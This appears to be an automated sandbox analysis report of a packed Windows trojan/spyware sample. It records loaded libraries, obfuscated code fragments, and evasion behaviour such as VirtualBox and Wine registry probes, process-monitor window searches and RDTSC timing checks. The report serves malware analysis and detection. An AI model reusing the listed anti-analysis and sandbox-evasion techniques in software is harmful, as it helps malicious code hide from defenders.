Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD118F	0_2_00DD118F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E0D1BD	0_2_00E0D1BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EAD1B7	0_2_00EAD1B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD71B6	0_2_00DD71B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8F185	0_2_00E8F185
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB3198	0_2_00EB3198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC119B	0_2_00EC119B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E95195	0_2_00E95195
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E17162	0_2_00E17162
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E13166	0_2_00E13166
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EAB17A	0_2_00EAB17A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6717D	0_2_00E6717D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDB142	0_2_00DDB142
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED9147	0_2_00ED9147
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC9177	0_2_00DC9177
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDF170	0_2_00DDF170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EBB152	0_2_00EBB152
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E0515E	0_2_00E0515E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1B126	0_2_00E1B126
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2112E	0_2_00E2112E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DF510C	0_2_00DF510C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E11105	0_2_00E11105
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E9110F	0_2_00E9110F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2B100	0_2_00F2B100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4111D	0_2_00E4111D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E0F11B	0_2_00E0F11B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E9F116	0_2_00E9F116
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC92D9	0_2_00DC92D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E572E2	0_2_00E572E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D892D0	0_2_00D892D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7D2D1	0_2_00E7D2D1

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00D74A30 appears 76 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00D68000 appears 55 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9975940743944637
Source: file.exe	Static PE information: Section: beewzkou ZLIB complexity 0.994259854752191

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D90A6C CoCreateInstance,

0_2_00D90A6C

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2081690867.0000000006074000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106981627.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082173898.0000000006055000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 1858048 > 1048576

Source: file.exe

Static PE information: Raw size of beewzkou is bigger than: 0x100000 < 0x19da00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d3039 should be: 0x1d353a

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: beewzkou
Source: file.exe	Static PE information: section name: avotpigk
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB9C85 push ebx; mov dword ptr [esp], 18955365h	0_2_00DBA2D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBC0D8 push eax; mov dword ptr [esp], 5778CBA3h	0_2_00DBC96A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAE0F0 push 66943CFDh; mov dword ptr [esp], edi	0_2_00FAE0FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBC0E2 push eax; mov dword ptr [esp], ecx	0_2_00DBC132
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBC0E2 push 00771965h; mov dword ptr [esp], eax	0_2_00DBC9D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBC082 push edi; mov dword ptr [esp], 157F563Ch	0_2_00DBC093
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBC082 push eax; mov dword ptr [esp], esp	0_2_00DBCFBD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBC082 push edi; mov dword ptr [esp], ecx	0_2_00DBDC99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104E162 push eax; mov dword ptr [esp], 60186B77h	0_2_0104E1A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104E162 push esi; mov dword ptr [esp], ebx	0_2_0104E25A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104E162 push edx; mov dword ptr [esp], 7637C081h	0_2_0104E277
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104E162 push ecx; mov dword ptr [esp], 05A4014Bh	0_2_0104E2A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBC0B5 push 05610E66h; mov dword ptr [esp], eax	0_2_00DBC0CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F80059 push ebx; ret	0_2_00F80068
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB8059 push edi; mov dword ptr [esp], edx	0_2_00FB807E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAA03C push ecx; mov dword ptr [esp], esi	0_2_00FAA05B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBE00D push 0562658Dh; mov dword ptr [esp], eax	0_2_00DBE01F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E9801F push 4C717000h; mov dword ptr [esp], esi	0_2_00E980E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E9801F push ebp; mov dword ptr [esp], 42957610h	0_2_00E9815A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E9801F push ecx; mov dword ptr [esp], ebx	0_2_00E98165
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2E1EC push eax; mov dword ptr [esp], edi	0_2_00E2E64A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2E1EC push 500F1B00h; mov dword ptr [esp], edi	0_2_00E2E757
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB81FB push ecx; mov dword ptr [esp], 08B11086h	0_2_00DB8203
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB81FB push esi; mov dword ptr [esp], 3BFE113Ch	0_2_00DB820E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101202E push edi; mov dword ptr [esp], esi	0_2_01012061
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101202E push ecx; mov dword ptr [esp], ebx	0_2_010120A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA61C0 push esi; mov dword ptr [esp], esp	0_2_00FA6280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE41A0 push ebx; mov dword ptr [esp], 13B619B9h	0_2_00FE41B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFE1A0 push 52C460DFh; mov dword ptr [esp], esp	0_2_00FFE232
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01024068 push eax; mov dword ptr [esp], 38B79261h	0_2_01024095
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6A182 push eax; mov dword ptr [esp], 7028B000h	0_2_00F6A7D6

Source: file.exe	Static PE information: section name: entropy: 7.978482515372212
Source: file.exe	Static PE information: section name: beewzkou entropy: 7.9535775684603935

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB917A second address: DB9184 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD714BB0746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB9184 second address: DB91A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB91A4 second address: DB91A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB91A8 second address: DB91B2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD714BB3916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB8A03 second address: DB8A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F392B6 second address: F392C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB391Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F392C8 second address: F392CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3827D second address: F3828B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3828B second address: F38292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F383D5 second address: F383DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F383DB second address: F383EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FD714BB0746h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F383EF second address: F383F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F383F4 second address: F383FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F383FA second address: F3843C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD714BB3916h 0x0000000a popad 0x0000000b jmp 00007FD714BB391Ah 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD714BB3935h 0x0000001a jg 00007FD714BB3916h 0x00000020 jmp 00007FD714BB3929h 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3843C second address: F38448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD714BB0746h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F386FF second address: F3870C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FD714BB3916h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3899C second address: F389DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD714BB0753h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007FD714BB0757h 0x00000012 push edx 0x00000013 jmp 00007FD714BB074Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C679 second address: F3C680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C680 second address: F3C6A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C6A3 second address: F3C6AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD714BB391Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C702 second address: F3C729 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD714BB0751h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FD714BB074Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C729 second address: F3C764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FD714BB3918h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 mov ch, 98h 0x00000025 call 00007FD714BB3919h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C764 second address: F3C768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C768 second address: F3C76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C76E second address: F3C7A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD714BB0755h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 js 00007FD714BB0758h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C7A7 second address: F3C7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C7AB second address: F3C7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C7AF second address: F3C7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a jp 00007FD714BB3916h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C7C6 second address: F3C829 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jns 00007FD714BB0754h 0x00000011 pop eax 0x00000012 and cx, 4C08h 0x00000017 push 00000003h 0x00000019 sub dword ptr [ebp+12455565h], eax 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007FD714BB0748h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b push 00000003h 0x0000003d mov dword ptr [ebp+122D1A6Bh], esi 0x00000043 push FDAD38C5h 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C829 second address: F3C842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB3924h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C9D4 second address: F3C9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FD714BB0750h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C9F5 second address: F3C9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C9FA second address: F3CA37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 xor esi, 3910CFF9h 0x0000000f push 00000003h 0x00000011 or edi, 00938781h 0x00000017 push 00000000h 0x00000019 js 00007FD714BB074Ch 0x0000001f or ecx, dword ptr [ebp+122D2A10h] 0x00000025 push 00000003h 0x00000027 and esi, 5481F2D7h 0x0000002d push 5FD68B0Ah 0x00000032 jnp 00007FD714BB0750h 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3CA37 second address: F3CAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 602974F6h 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FD714BB3918h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D30D0h], edx 0x0000002c mov ecx, dword ptr [ebp+122D2A74h] 0x00000032 lea ebx, dword ptr [ebp+12457570h] 0x00000038 mov dword ptr [ebp+122D2C6Fh], ebx 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 jnl 00007FD714BB392Ch 0x00000046 push ecx 0x00000047 jnc 00007FD714BB3916h 0x0000004d pop ecx 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F59932 second address: F59938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F59D45 second address: F59D81 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD714BB3916h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007FD714BB3925h 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 js 00007FD714BB3916h 0x0000001d jmp 00007FD714BB391Eh 0x00000022 pop eax 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F59D81 second address: F59D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A056 second address: F5A062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FD714BB3916h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A481 second address: F5A490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jne 00007FD714BB0746h 0x0000000f rdtsc
